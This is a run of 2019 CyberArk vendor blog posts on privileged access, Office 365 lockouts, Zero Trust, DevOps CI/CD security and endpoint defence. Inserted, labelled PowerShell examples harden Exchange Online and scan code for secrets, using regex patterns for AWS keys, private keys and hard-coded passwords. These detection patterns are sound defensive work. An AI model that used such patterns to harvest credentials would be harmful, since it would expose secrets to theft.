Law Firms Need to Prioritize Privilege to Protect Client Information https://www.cyberark.com/blog/above-the-law-law-firms-prioritize-privilege-to-protect-client-information/ Thu, 05 Sep 2019 15:24:04 +0000 https://www.cyberark.com/?p=73552

It’s well understood that law offices have access to extremely valuable client information and secrets – just look at the case of the Panama Papers, which implicated many high profile individuals and political leaders with tax fraud and other illegal activities.

There are many ways in which a law firm’s client data can become compromised, but being in the business of privileged access management, we will focus on the importance of locking down the privileged access pathway to protect the valuable data that law firms are entrusted with protecting.  But first, a few observations:

  1. When it comes to securing confidential data, law firms are often not held to the same standards as other service providers.

Some regulations and standards covering confidential data security do not specifically include law firms in their purview, instead referencing them under generic “covered entity” or “business associate” categories. The Payment Card Industry Data Security Standard (PCI DSS), Health Insurance Portability and Accountability Act (HIPAA) and a few others do cover law firms and rule that they must maintain certain controls to safeguard sensitive information.

But, is that enough?  And what checks and balances are actually in place to ensure proper safeguards are maintained? Many of these regulations and standards do not actually require law firms to do anything to demonstrate compliance or to make any kind of self-attestation.  Many are not subject to regular audits.

Of course, attorneys have a professional duty to make all reasonable efforts to protect and maintain the confidentiality of client information.  A law firm entrusted with client data must follow ethical and professional conduct rules when handling the data, which includes an obligation to keep the client’s information secure.  However, is an ethical obligation and some loosely enforced requirements enough when it comes to something as important as protecting highly valuable client information and data? Probably not. 

  2. Outside counsel and outsourced professional services often slip past InfoSec.

When an organization invites outside counsel into its network or provides access to confidential information, it introduces third-party risk.  Most organizations don’t do enough to secure third-party vendor access and outsourced legal counsel is often overlooked by InfoSec teams, which significantly increases the security risk.

A large law firm with more than 4,000 attorneys that serves some of the largest organizations around the world fell victim to the NotPetya attack a few years ago, disrupting services and costing them millions.  Better endpoint protection is needed as ransomware continues to be a threat to law firms both large and small.  When it comes to access rights, law firms need to be treated the same as any other remote third-party vendor.

  3. The average law firm frequently uses outdated technology.

Many law firms, especially the smaller ones, lack adequate IT and security awareness and resources. This can lead to them continuing to use old and outdated tools and technology, staying on unsupported and outdated versions of software, and ignoring security patch updates issued by their technology providers.  These types of environments are prime targets for attackers to exploit.

For instance, in the case of the Panama Papers, the firm Mossack Fonseca suffered a SQL injection attack on one of its subdomains, which provided access (via an outdated plugin) to a content management system that had a known vulnerability that the firm never patched.  From there, the attackers lifted credentials from a database that Mossack Fonseca’s security had left in clear text.

That was the beginning of the end.  Without adequate security resources to protect clients’ personal information, law firms not only bring into question their ability to comply with ethical and professional conduct rules, they also become vulnerable to a potentially devastating cyber attack.

Why Privileged Access Management Matters

One of the most common strategies used by malicious insiders and external attackers is to attempt to gain privileged access in order to execute a successful attack.  Privileged accounts are everywhere – in every networked device, database, application and server on-premises and in cloud and hybrid environments.  Nearly all advanced attacks involve the compromise of privileged credentials.

These credentials provide anyone who gains possession of them the ability to control an organization’s resources, disable security systems and grease the tracks for providing fast access to vast amounts of client information and other sensitive data.  In the wrong hands, access to this data can cause significant business disruption.  Consider the types of client information and documentation these firms have standing access to:

  • Business dealings
  • Trade secrets
  • Personal data
  • Health care information
  • Proprietary information
  • Material non-public information

To mitigate the risk of a serious cyber attack, law firms need to adopt a proactive security solution that specifically addresses their privileged access exposure.  For instance, in the event that the InfoSec team approves access for outsourced counsel or legal services, they will often issue mandates that require the law firm to maintain tight privileged access management controls and robust audit capabilities to ensure that the confidential data they are entrusted with remains safe.

It’s Not Just About Securing Confidential Data; It’s About Securing a Reputation

There are many factors that contribute to a firm’s poor security posture, such as access to security expertise and depth of resources, trained personnel and low IT budgets.  Many small to mid-size firms only have a few employees in their IT departments.  With the overwhelming number of security solutions out in the market to pick and choose from, figuring out where to start when developing a cybersecurity strategy is a daunting task even for a well-staffed IT security team.

One effective way to work with limited staff is to prioritize cybersecurity risk in order to better align with available resources.  Firms should evaluate security solutions based on their ability to mitigate the most risk per dollar spent, with low up front and ongoing cost.  In other words, look for a solution that has minimal operational overhead and is easy to implement and maintain with limited IT staffing resources.

For law firms, reputation is everything.  Doing what’s right for clients and protecting both brand and reputation is an achievable outcome.  CyberArk Privilege Cloud is a Software-as-a-Service (SaaS) solution that provides foundational privileged access security capabilities.  The solution provides organizations, including law firms, with a simple way to securely store, rotate and isolate credentials, monitor sessions and quickly deliver risk reduction to the business.

Download the CyberArk Privilege Cloud datasheet or request a demo today to see how to gain the confidence of clients by securing privileged access to their most confidential information and sensitive data.

]]>
Three Ways for Healthcare to Handle Cyber Threats https://www.cyberark.com/blog/three-ways-for-healthcare-to-handle-cyber-threats/ Tue, 03 Sep 2019 21:11:02 +0000 https://www.cyberark.com/?p=73514

The cost of a data breach has surged over the past five years to almost $4 million per breach. Yet, while every industry is a target, some are being hit harder than others. A recently released study shows that healthcare organizations face an average of $6.5 million per incident, which is about 60 percent higher than other industries.

The modernization of networks, the increase in mergers and acquisitions (M&A) and the Internet of Medical Things (IoMT) make healthcare a particularly attractive target for cyber attackers. Add the growing need to share information and it’s easy to see why healthcare breach costs are soaring.

Bryan Murphy, Director, Consulting Services – Americas, recently wrote a series of articles for HealthcareITNews, exploring the evolving healthcare threat landscape and outlining steps providers should take to strengthen their overall cybersecurity posture. Following are highlights:

Prioritizing Privilege to Protect Patient Data

Fast-expanding, interoperable care delivery networks generate huge volumes of patient data – or Electronic Personal Health Information (ePHI). From birth dates and social security numbers to private health concerns and detailed illness histories, healthcare information can be much more valuable to cyber attackers than credit card numbers. Furthermore, external attackers are not the only threat: A recent study shows that one in five healthcare employees would be willing to sell sensitive information to unauthorized parties for less than $1,000.

Healthcare organizations need privileged accounts and credentials for administrators to access applications or data, or for devices to access the systems created by the technological advances of the past two decades – especially ePHI. For example, cloud-based Electronic Health Record (EHR) applications, patient diagnostic data integration from third-party services and payer organization reimbursement processes all require privileged access. Cyber attackers recognize this and look for weak points across the continuum of care that they can exploit to escalate privileges and get their hands on ePHI.

According to industry experts, protecting privileged access is the single best way to mitigate risks associated with ePHI theft and the people and devices that can access it. Learn more by reading the full HealthcareITNews article.

Healthcare Can’t Wait for Device Makers to Prioritize Security

Internet-connected medical devices – such as infusion pumps, heartrate monitors and even imaging and biopsy tables – have become a critical part of the healthcare environment. However, this broad movement of connected devices represents a growing cybersecurity threat that puts patient data, medical information and, potentially, patient wellbeing at risk.

Securing connected devices – both unsupported legacy devices and new IoMT devices – has emerged as one of the top priorities for healthcare IT security professionals. In fact, medical devices now outnumber healthcare industry staff three to one.

Healthcare leaders are prioritizing establishing privileged access controls to secure and manage the accounts, credentials and secrets that can give users wide-ranging powers on a device, network or third-party application. Read the full HealthcareITNews article for more details.

How Healthcare CISOs Can Triage IT Risk

As the healthcare industry embraces digital transformation, ransomware, insider threats and third-party breaches are getting more sophisticated and more difficult to prevent. Healthcare CISOs must mitigate the dangers of these daily threats and, at the same time, quantify cybersecurity risk in dollars and cents.

To do this effectively, healthcare CISOs need to understand how every employee, application and IT technology impacts their risk profile. This requires a redefinition of the way they assess risk and new skillsets and tools to help make the right cybersecurity investment decisions.

By understanding the threats and outcomes that could have the greatest impact on both the bottom line and day-to-day care of patients, healthcare CISOs can more effectively identify potential cyber threats and where the greatest impact is to the organization. Learn more about cybersecurity measurement and reporting, as well as frameworks that help quantify risk and risk mitigation ROI, in this HealthcareITNews article.

Healthcare providers require strong privileged access management (PAM) to minimize risk and protect their investments in integrated care delivery networks. The CyberArk Privileged Access Security Solution helps providers protect ePHI, secure complex delivery networks, safeguard investments and deliver quality patient care with confidence. Learn more in our eBook, infographic and on-demand webinar.
How to Prevent Office 365 Account Lockouts https://www.cyberark.com/blog/how-to-prevent-office-365-account-lockouts/ Tue, 03 Sep 2019 14:27:11 +0000 https://www.cyberark.com/?p=98973

Office 365 lockouts are a major employee productivity issue – here are tips and tricks to stop account lockouts.

Active Directory account lockouts caused by brute force attacks on Office 365 are one of the top reported issues for Office 365 customers. According to Microsoft, there are more than 300 million fraudulent sign-in attempts every day. Because a breach may not have occurred, it is not the highest security concern. Nevertheless, it is a major employee productivity issue and overloads IT with support cases. If your Office 365 domain is federated with Idaptive, here are four things that can help stop account lockouts caused by brute force attacks on Office 365.

  1. Disable legacy email protocols such as SMTP, POP, and IMAP. Protocols that use basic authentication are vulnerable to scripted brute force attacks and do not support multi-factor authentication or Microsoft’s Conditional Access policies. These protocols are rarely used nowadays but enabled by default in Office 365.
    1. Enable Office applications to use modern authentication – Details here
    2. Disable legacy protocols for mailbox accounts. You can disable them for all users but leave them enabled for specific user accounts that may still need them, for example SMTP for an account used by a network printer. Details here
  2. Go passwordless with multi-factor authentication. Replace password authentication with non-password authentication, so that wrong passwords cannot be entered in the first place. Here is a brief video demonstration of how Outlook can be set up without a password.
    1. Enable passwordless authentication for the Idaptive User Portal login.
    2. Optionally enable passwordless authentication at the app level if there is a security requirement for additional MFA.
  3. Restrict how email is accessed on mobile devices.
    1. Use the Outlook mobile app instead of the native email client. Native email clients use the ActiveSync protocol, which does not use modern authentication. The Outlook mobile app supports modern authentication and will redirect users to Idaptive for passwordless authentication.
    2. Implement MDM/EMM for mobile devices to:
      • Enforce a passcode on the device.
      • Have the ability to wipe the device if lost or stolen.
      • Have the ability to remotely remove (selectively wipe) the Outlook mobile app from a BYOD/personal device, when the employee no longer works for you.
    3. Implement ActiveSync quarantine to control which devices can access email via ActiveSync. Details here
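
The Exchange Online side of steps 1 and 3 above, as an added example that is not from the original post, Idaptive or CyberArk: it assumes the ExchangeOnlineManagement PowerShell module is installed and the signed-in account holds the Exchange Administrator role; the mailbox and notification addresses are constructed placeholders. The passwordless settings in step 2 are configured in the Idaptive portal, so they are not scripted here.

```powershell
# Added example (not from the original post or from Idaptive/CyberArk):
# Exchange Online PowerShell for steps 1 and 3c above. Assumes the
# ExchangeOnlineManagement module and an account with the Exchange
# Administrator role. 'printer-scans@example.com' and
# 'it-security@example.com' are constructed placeholders.

Connect-ExchangeOnline

# Step 1a: allow Office clients to use modern (OAuth 2.0) authentication.
Set-OrganizationConfig -OAuth2ClientProfileEnabled $true

# Step 1b, tenant-wide: turn off SMTP AUTH for every mailbox that does not
# explicitly override it. $true here means "disabled".
Set-TransportConfig -SmtpClientAuthenticationDisabled $true

# Step 1b, per mailbox: disable POP and IMAP on all existing mailboxes.
Get-CASMailbox -ResultSize Unlimited | ForEach-Object {
    Set-CASMailbox -Identity $_.Identity -PopEnabled $false -ImapEnabled $false
}

# Mailboxes created later inherit their defaults from the CAS mailbox plans,
# so change the plans too or new users will come back with POP/IMAP enabled.
Get-CASMailboxPlan | Set-CASMailboxPlan -PopEnabled $false -ImapEnabled $false

# Exception: a service mailbox used by a network printer still needs SMTP
# AUTH, so re-enable it for that one account only ($false = enabled).
Set-CASMailbox -Identity 'printer-scans@example.com' -SmtpClientAuthenticationDisabled $false

# Step 3c: ActiveSync quarantine. New or unknown devices are held until an
# admin approves them instead of being allowed to authenticate freely.
Set-ActiveSyncOrganizationSettings -DefaultAccessLevel Quarantine `
    -AdminMailRecipients 'it-security@example.com'

# Verification: list every mailbox that still has a legacy protocol on, or
# that overrides the tenant-wide SMTP AUTH setting. The output should be
# only the approved exceptions.
Get-CASMailbox -ResultSize Unlimited |
    Where-Object { $_.PopEnabled -or $_.ImapEnabled -or $_.SmtpClientAuthenticationDisabled -eq $false } |
    Select-Object Identity, PopEnabled, ImapEnabled, SmtpClientAuthenticationDisabled, ActiveSyncEnabled

Disconnect-ExchangeOnline -Confirm:$false
```

Keep the verification query as a recurring check: every mailbox it returns is a password-only entry point that a scripted guessing run can still lock out, so the list should match the documented exceptions and nothing else. Since this post was written, Microsoft has turned Basic authentication off in Exchange Online for POP, IMAP and ActiveSync by default; SMTP AUTH is the one legacy protocol a tenant can still enable, so the tenant-wide SmtpClientAuthenticationDisabled setting and its per-mailbox exceptions are where the remaining exposure sits.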

Looking to get started with Idaptive? Check out our free 30-day trial here.

Next-Gen Access and Zero Trust are the PB&J of Security https://www.cyberark.com/blog/next-gen-access-and-zero-trust-are-the-pbj-of-security/ Thu, 29 Aug 2019 19:45:43 +0000 https://www.cyberark.com/?p=98925

I recently wrote about how to deal with old technologies when a company is switching to a new security philosophy (tl;dr: Don’t just rip and replace!). Today, we’re going to look at the other side of the same coin. What happens when an organization is ready to achieve Zero Trust nirvana – that sought-after state of freedom from suffering and rebirth every CISO and IT pro spends their lives trying to achieve?

There are two planes that lead to this bit of transcendence. The first is philosophical, which we’ve discussed: A reckoning that the current security strategy isn’t good enough, and having the entire security team fully bought in to Zero Trust. The second is technological and it’s called Next-Gen Access.

Next-Gen Access is a technological approach to identity and access management (IAM) that marries modern single sign-on (SSO), adaptive multi-factor authentication (MFA), provisioning and lifecycle management, endpoint and mobile security, and user behavior analytics into one platform. It’s the perfect technological partner to a Zero Trust approach because its sole purpose is to reduce friction, add efficiency, and increase capabilities.

Next-Gen Access solutions are better equipped to enable a Zero Trust approach to access with advanced capabilities that intelligently determine the authenticity of a digital user and their device, govern access across an organization’s resources, and react when risky behavior is detected. This bolsters an organization’s security posture while also improving end user experiences, making everyone more productive.

It’s a platform approach to security, combining all the tools necessary to create a true Zero Trust environment, with the added benefit of integrated out-of-the-box, day-to-day management features and a synergy between all the tools on the platform that enable things like broad contextual awareness, increased automation, and real-time decision making.

Next-Gen Access provides three main benefits when paired with Zero Trust:

  1. It vastly improves user experience. Traditionally, adding more authentication factors increases security, but also increases friction, making the people using the apps and services less happy, less productive, and more prone to poor security hygiene. Next-Gen Access is able to marry three separate technologies (single sign-on, adaptive multi-factor authentication and user analytics) to discover the context around areas where additional friction should, and most importantly should not, be added. Is this person using an app or service in a different way than they usually do? Are they in a location they’ve never been before, or on a device that’s never been used to log in? If the answer is yes to any of these, the risk is increased and the system can throw up an additional level of verification. If not, then the risk level is decreased as they most likely are who they say they are and can smoothly use the app without having to log in, creating a frictionless experience.
  2. It’s easier on IT. Reducing the burden on IT is an almost universal goal in every company. After all, what’s the goal of an IT business unit? They are not in the business of making things harder for people. They help facilitate new approaches to business, digital experiences and so on. Next-Gen Access gives them time for that, rather than writing and managing access to myriad static access rules. There’s also the opportunity cost from not having to invest time and money in a Frankenstein identity solution when Next-Gen Access is integrated under one umbrella. One set of tools to implement, configure and roll out. And an added bonus: buying from one vendor is almost always cheaper.
  3. Next-Gen is where the best and most recent thinking is happening. Innovation is not happening for on-premise software and appliances – those will always provide the same, static experiences for IT and users. Developers and IT are focused on Next-Gen Access solutions where they have the ability to use things like artificial intelligence, massive data pools, and seamless interoperability between thousands of cloud apps to build things like automation, deep context, and more into apps and services.


Think of Zero Trust and Next-Gen Access like you would a road trip. Zero Trust is the map that tells you how to get to where you want to go, while Next-Gen Access is the car. It’s easier and more comfortable to get into a brand new Audi, get up to speed, set the cruise control and go than it is to drive an old Volkswagen Bug with a stick shift. (Or worse, buy a separate engine, body, wheels, and seats from different vendors and “integrate” your own car.)

Most importantly though, a Next-Gen Access approach frees up IT to be an enabler. We in the security business sometimes get stuck on stopping breaches as the be-all and end-all. That’s obviously important, but what happens after the breaches are stopped? The focus then needs to turn back to helping the business — the original purpose of IT. Next-Gen Access helps make the security aspect of security solutions fade into the background so the enabling aspect can come into focus and become a foundational piece for new customer experiences or new ways to think about identity and how it can enable productivity.

That’s what I call nirvana.

*****************************
Read the Zero Trust series here:

Zero Trust Series – 1  What Is Zero Trust and Why Is it So Important?

Zero Trust Series – 2 Like the Night King, Perimeter Defense is Dead

Zero Trust Series – 3 Imposter Syndrome: Why You Can’t Separate the “Good Guys” from the “Bad Guys”

Zero Trust Series – 4 Passwords are Just one Piece of the Cybersecurity Puzzle

Zero Trust Series – 5 The Future of Cybersecurity is Artificial: Intelligence Will Transform Enterprise Governance

Zero Trust Series – 6 Protect, Detect, Deter, Respond is Not a Security Strategy.

Zero Trust Series – 7 Upping the Security Ante: How to Get Teams’ Buy-in for Zero Trust

Zero Trust Series – 8 Next-Gen Access and Zero Trust are the PB&J of Security

Zero Trust Series – 9 Passwords Need Fixing. Zero Trust is the Solution.

Zero Trust Series – 10 The One-Two Punch of Zero Trust. Verify Every User, Validate Every Device.

Zero Trust Series – 11 “Should I Stay or Should I Go?” Artificial Intelligence (And The Clash) has the Answer to Your Employee Access Dilemma.

Zero Trust Series – 12 Grow Up! Plotting Your Path Along the Zero Trust Maturity Model

Four Things Security Can Do to Keep Up with DevOps CI/CD https://www.cyberark.com/blog/four-things-security-can-do-to-keep-up-with-devops-ci-cd/ Tue, 20 Aug 2019 13:00:45 +0000 https://www.cyberark.com/?p=72168 DevOps CI/CD Security

Editor’s Note: Part 4 of a 5-part series providing practical guidance and insights to security leaders for securing DevOps environments. This series is based on insights from Global 1000 Chief Information Security Officers (CISOs). This installment covers how security teams can adapt processes for modern application testing. This series includes information on how to:

  1. Transform the security team into DevOps partners
  2. Prioritize securing DevOps tools and infrastructure
  3. Establish enterprise requirements for securing secrets and credentials
  4. Adapt processes for application testing
  5. Evaluate the results

With the promise of shorter development cycles more closely aligned with business objectives, organizations are embracing DevOps for everything from insurance customer service and banking applications to mobile check-in and loyalty apps. With the push to be fast, agile and accelerate digital transformation initiatives, DevOps is perfectly suited to deliver high-value applications that can be rapidly iterated and scaled. Yet, while DevOps is increasingly essential for today’s digital business, it exposes new privileged access management-related risks that security teams must address.

This is particularly true when it comes to Continuous Integration, Continuous Delivery (CI/CD). Using Continuous Integration (CI), development teams can merge code changes to a repository and automatically integrate it into builds multiple times a day. Continuous Delivery (CD) requires that code always be in a deployable state so that it can be deployed to production at any time at the touch of a button.

Traditionally, security teams could put up “gates” in the development process to check that the application met security requirements before it was delivered. But with CI/CD, these gates no longer fit the deployment model and security teams will need to rethink and update their processes.

In this chapter of our CISO View Insights blog series, we’ll explore four ways that security teams can evolve their processes to keep pace with continuous application delivery while upholding key privileged access management requirements. These recommendations are based on the real-world experiences of CISOs from Global 1000 organizations.

  1. Integrate Automated Code Testing for Security Issues

Security teams should work to automate as much application testing as possible using a combination of custom scripts and commercial services.

An automated enforcement engine can perform tasks such as scanning code for secrets before it is checked into a repository. Automatic scanning can identify vulnerabilities and malicious code within applications quickly, an especially important benefit when working at the speed of DevOps. It can also make sure that applications – including any third-party code modules – retrieve secrets correctly from a centralized, encrypted vault. By automating testing and enforcement, security teams can also ensure that passwords are not recorded in event logs.

  2. Force Developers to Fix Security Issues with a “Break the Build” Approach

With automated testing, a test failure gives security teams a new way to drive and influence developer behavior to uphold important cybersecurity requirements. A “break the build” approach forces developers to fix the security issues in their code, since, until the problems are fixed, the developers won’t be able to deliver their code module. This approach also puts pressure on the security teams to have effective test programs and, ideally, to be able to rapidly guide developers to what they need to do to fix their security issues.

With a “break the build” approach, risk scoring becomes integral to build automation tools, so that when the risk exceeds a certain threshold, the build will automatically break.

In addition to implementing “break the build,” security teams should continue looking for ways to check for security issues earlier in the process, such as on code check-in or merge. The goal should always be to enforce application security policies as far left in the process as possible to mitigate the most risk.
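
A concrete form of the automated secrets check described in the first recommendation and the risk-scored “break the build” gate described in the second, as an added example that is not code from the CISO View report or from CyberArk: a PowerShell script that scans a source tree for embedded credentials and for code that writes passwords to logs, weights each finding, and exits non-zero when the total reaches a threshold. The rule set, the weights and the default threshold of 10 are constructed assumptions to be tuned to your own policy.

```powershell
# Added example, not code from the CISO View report or from CyberArk: a
# minimal "break the build" gate. It scans a source tree for embedded
# secrets and for code that writes passwords to logs, weights each finding,
# and exits non-zero when the total risk score reaches the threshold.
# The rule set, the weights and the default threshold of 10 are constructed
# assumptions; tune them to your own policy.
param(
    [string]$Path = '.',
    [int]$Threshold = 10
)

# Each rule: a display name, a .NET regex, and a weight added to the score.
$rules = @(
    @{ Name = 'AWS access key ID';       Pattern = 'AKIA[0-9A-Z]{16}';                                      Weight = 10 },
    @{ Name = 'Private key block';       Pattern = '-----BEGIN (RSA |EC |OPENSSH )?PRIVATE KEY-----';        Weight = 10 },
    @{ Name = 'Hard-coded password';     Pattern = '(?i)password\s*[:=]\s*["''][^"'']{6,}["'']';              Weight = 6 },
    @{ Name = 'Generic API key';         Pattern = '(?i)api[_-]?key\s*[:=]\s*["''][A-Za-z0-9_\-]{16,}["'']';  Weight = 6 },
    @{ Name = 'Password written to log'; Pattern = '(?i)\b(log|print|console)\w*\s*\(.*password';            Weight = 4 }
)

# Skip the .git directory and obvious binaries; everything else is scanned.
$skipExtensions = '.png', '.jpg', '.gif', '.zip', '.dll', '.exe', '.jar'
$files = Get-ChildItem -Path $Path -Recurse -File |
    Where-Object { $_.FullName -notmatch '[\\/]\.git[\\/]' -and $_.Extension -notin $skipExtensions }

# Collect one record per match; a file can trigger several rules.
$findings = @(foreach ($file in $files) {
    foreach ($rule in $rules) {
        Select-String -LiteralPath $file.FullName -Pattern $rule.Pattern -AllMatches | ForEach-Object {
            [pscustomobject]@{
                File   = $file.FullName
                Line   = $_.LineNumber
                Rule   = $rule.Name
                Weight = $rule.Weight
            }
        }
    }
})

# Sum the weights; an empty result set scores 0.
$score = [int]($findings | Measure-Object -Property Weight -Sum).Sum

if ($findings.Count -gt 0) {
    $findings | Format-Table File, Line, Rule, Weight -AutoSize | Out-String | Write-Host
}
Write-Host "Risk score: $score (threshold $Threshold)"

# This exit code is what breaks the build: the CI job treats a non-zero step
# as failed, so the module cannot be delivered until the findings are fixed.
if ($score -ge $Threshold) {
    Write-Host 'BUILD BROKEN: remove the secrets listed above and rotate any that were committed.'
    exit 1
}
exit 0
```

Run it as the first step of the pipeline, and again as a pre-commit hook where a non-zero exit blocks the commit, so the check sits as far left as the team’s workflow allows. A secret that reaches the scanner has already been written into a repository clone, so treat each finding as a credential to rotate, not only as a line to delete; the printed table is what lets the security team point the developer at the exact file and line, which is the rapid guidance the “break the build” approach depends on.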

  3. Maintain Manual Testing and Red Team Exercises

While integrating automated testing is essential, it cannot stop there. Remember that attackers are creative and persistent, and will often find ways to bypass the issues that automatic security tests are designed to find.

To catch these increasingly sophisticated attackers and stop attacks before they impact business, organizations must adopt an attacker’s mindset. To do so, use a combination of automated static and dynamic testing, as well as manual penetration testing. When pentesting, security teams should test both the tools used to roll out the application and the application itself. Periodic Red Team exercises can also be very helpful in uncovering vulnerabilities, identifying areas of improvement and making risk-prioritized recommendations.

  4. Consider Launching a Bug Bounty Program

Security teams can supercharge their ability to identify and address DevOps security risks and weaknesses by implementing a bug bounty program. With such a program, the company invites security researchers to find security issues, and pays a reward for issues found and confidentially reported.

Security researchers can find out, for example, if practitioners are embedding credentials in code or in DevOps tools, so that teams can quickly course-correct. The program can also help DevOps teams become more accountable for security. Furthermore, tracking the results can provide an ongoing visual record of security issues and their financial cost to the company.

Before launching a bug bounty program, it’s very important to set up a formal operating agreement between the organization and security researchers that establishes the expectation that the researchers will do no harm. As part of this, make sure the executive leadership team understands the nature of the program and the norms of the security researcher community – and maintain transparency throughout the process.

Security needs to embed and integrate security processes into the automated CI/CD processes, such as with automated testing and break the build approaches. Additionally, security needs to step out of the box and set up processes to hunt down and identify the risks and vulnerabilities that “cannot happen.” This means using pen-testing, red teams, bug bounties and other creative approaches to find and address issues before attackers do.

Lastly, security should continue to collaborate with developers and remind them that developers and security professionals share responsibility for security. It’s important for developers to understand that what security wants is to help development teams ensure that the applications they deploy are secure.

For more insights on bringing DevOps culture and security teams into alignment to better secure today’s digital business, download the full CISO View report, Protecting Privileged Access in DevOps and Cloud Environments, watch a short highlights video or tune into our on-demand webinar.

Biometric Authentication Key to Remote Access for Vendors https://www.cyberark.com/blog/biometric-authentication-key-to-remote-access-for-vendors/ Thu, 15 Aug 2019 13:00:55 +0000 https://www.cyberark.com/?p=72003 Biometric Authentication for Remote Access

Many organizations today rely on contracted remote vendors to manage critical systems, freeing themselves up to focus on their own core competencies. However, the fact that these vendors operate remotely further breaks down the traditional IT perimeter and introduces a new challenge — ensuring that remote vendors have proper access to the specific systems that they need while only providing access when they need it. Organizations often track who is accessing what systems or assets within their environment using the first step of authentication – where users or machines somehow prove that they are who (or what) they say they are. It’s only when every remote vendor user is identified and authenticated that the process of granting (and removing) access can begin.

Relying on manual processes to provision and de-provision access to remote vendors is far from foolproof and introduces lots of potential issues. Remote vendors are contracted for only specific periods of time and, typically, aren’t part of the Active Directory or other directory services. They also usually only need access to a specific subset of systems, bound by either the length of their contract with the host organization or the number of sessions it takes to complete their tasks. Manual processes often lead to any combination of: over-provisioning access so that remote vendors get access to systems they don’t need, under-provisioning access and making it difficult for the remote vendors to do their jobs or leaving unnecessary standing access for the vendor long after it’s moved on.

Bring-your-own-device policies have become the norm for remote access, making the job of the IT security team that much harder and further breaking down the “perimeter” as we know it. IT teams need a way to ensure that these devices are secure even when they’re accessing critical systems from afar. Zero Trust focuses security policies and access controls on user and device identity rather than the location of the user or the device. This affects what the ideal method of authentication is.

Proving identity through authentication, whether outside or inside the office, can take many shapes. Examples include classics like entering a username and password combination or more modern methods like biometric recognition systems or using a trusted and known device. At a high-level, authentication typically takes three forms:

  1. Something you know. Examples: A secret word or a username and password combination
  2. Something you have. Examples: Your smartphone or a name badge
  3. Something you are. Examples: A fingerprint or a retina scan

These are the three top-level forms of authentication, but there are countless technological advances that introduce ways for companies to regulate and track who’s accessing what. One thing that’s typically recommended, especially for critical assets, is instituting an additional layer of security with multi-factor authentication, which requires users to utilize more than one method of proving their identity. This can include something they know, like the answer to a security question or something they have, like a text message confirmation sent to a cell phone.

Up until recently, authentication for remote vendors has typically leveraged VPNs, which provide sweeping network access for remote users. While VPNs do have security measures in place to attempt to verify identity, they often allow remote vendors unfettered access to systems that they don’t need to access. Some organizations opt to ship corporate laptops to their remote vendors, only granting access through these remote computers. Agents installed on the laptops ensure that remote vendors only access the systems they’re supposed to. This falls back on the “something you have” form of authentication and leaves organizations susceptible to laptop theft or damage.

“Something you know” and “something you have” are both methods with inherent blind spots. “Something you know” can be figured out by someone else. Cyber attackers have a 30-year history of cracking loosely protected passwords. “Something you have” can be stolen or intercepted. Mobile devices, corporate laptops and the equivalent, being portable, are all very vulnerable to this. So, organizations look for new ways to secure their most sensitive internal systems. People lose their devices or re-use passwords more often than we care to admit. But your fingerprint, for example, will always be a unique pattern. Using a retina or fingerprint scan instead of a password or a company phone can remove avenues of attack and improve security while also making for a smoother process for the end-user.

By introducing a better form of biometric authentication, organizations can provide remote vendors with a stronger and more convenient method of confirming their identity. However, managing all of that can be a lot of work. Most of the common methods require establishing back-end policies and strategies to ensure that users are only accessing the systems that they need for their jobs, provisioning this access when it’s needed and de-provisioning access when the need is over. Until recently, there wasn’t a good solution to this problem.

Biometric authentication is particularly suited for Zero Trust for the same reason that it’s ideal for authenticating remote vendors – biometric authentication can’t be stolen, lost in transit, forgotten or figured out. For this reason, organizations using the Zero Trust security model often choose biometric authentication to verify their remote vendors. Combining biometric authentication with a strong backend solution enables organizations to provide only the right access to remote vendors and automatically provision and de-provision. That is exactly what CyberArk Alero does.

Learn more about CyberArk Alero, a new SaaS-based solution from CyberArk. Alero combines Zero Trust access, biometric authentication and just-in-time provisioning to secure remote vendors accessing critical systems managed by CyberArk. It doesn’t need VPNs, agents or passwords and creates a seamless and secure experience for IT administrators, operations teams and remote vendor users.

Five Tools for a Defense-in-Depth Strategy for Endpoints https://www.cyberark.com/blog/five-tools-for-a-defense-in-depth-strategy-for-endpoints/ Wed, 14 Aug 2019 13:29:37 +0000 https://www.cyberark.com/?p=71975 Defense-in-Depth

Today’s digital workforce looks very different than it did 10 – even five – years ago. Employees, contractors and vendors are spread across multiple locations, some work remotely, and most use a variety of mobile devices to do their jobs. These increasingly distributed teams still need a way to access data and assets whether from the corporate network or the cloud. But, now they need that access to work across many different locations and devices.

With the expanding attack surface, cyber attacks on the endpoint, such as phishing and ransomware, need to be taken seriously. In the CyberArk Global Advanced Threat Landscape 2019 Report, 60% of respondents identified external attacks, such as phishing, as one of the top security risks for their organization and 59% of respondents identified ransomware as a top security risk.

What is Endpoint Security?

Coined in recent years, “endpoint security” is a term used widely by security professionals at cybersecurity events and conferences and on blogs and webinars. The actual definition of “endpoint security” varies widely depending on who you ask.

To understand the true definition of endpoint security, it’s first important to define what an endpoint actually is. An endpoint is any user device that connects to an enterprise network. This can include, but is not limited to, laptops, desktops, tablets, mobile phones and servers. Each of these endpoints provides an entry point to applications and corporate assets.

A Defense-in-Depth Strategy for Endpoint Security: Five Essential Tools

Historically, enterprises protected their laptops, desktops and servers with a firewall and perhaps an antivirus solution. But, as security threats evolve and digital transformation strategies accelerate, it has become clear that a more comprehensive, defense-in-depth approach is necessary to effectively mitigate risk. Since there is no silver bullet for endpoint protection, modern organizations must utilize a mix of advanced methodologies and tools. In this blog, I will outline the five technologies you must have in place to keep your laptops, desktops and servers secure.

The five key technologies you need to secure your endpoint:

  1. Endpoint detection & response (EDR). Endpoint detection and response is a technology that addresses the need for continuous monitoring and response to advanced threats. Endpoint detection and response solutions collect, record and store large volumes of data from endpoint activities to provide security professionals with the comprehensive visibility they need to detect, investigate and mitigate advanced cyber threats.
  2. Antivirus or next-gen antivirus. For as long as endpoints have been, and will be, in existence (whether connected to the Internet or not), there has and will always be a need for antivirus solutions. There will never be a time when people – from mischievous youths seeking thrills to hardened cybercriminals looking to exploit billion-dollar companies – will stop looking to find ways to commit fraud, cause widespread damage or just experience the rush of breaking into a computer. Not every type of cyber attack can be prevented with antivirus software, but it’s an important tool to have in your cybersecurity toolset.
  3. Privilege management. Also known as the principle of least privilege (POLP), this is a concept and practice for limiting access rights for users and running processes only for those who absolutely require them to perform their tasks. Implementing least privilege management means enforcing the minimal level of user rights – or permissions – that allow the user to perform his or her designated role in the organization. As the endpoint attack surface continues to expand across digital enterprises, least privilege enforcement is a critical component of endpoint security, necessary for reducing the risk.
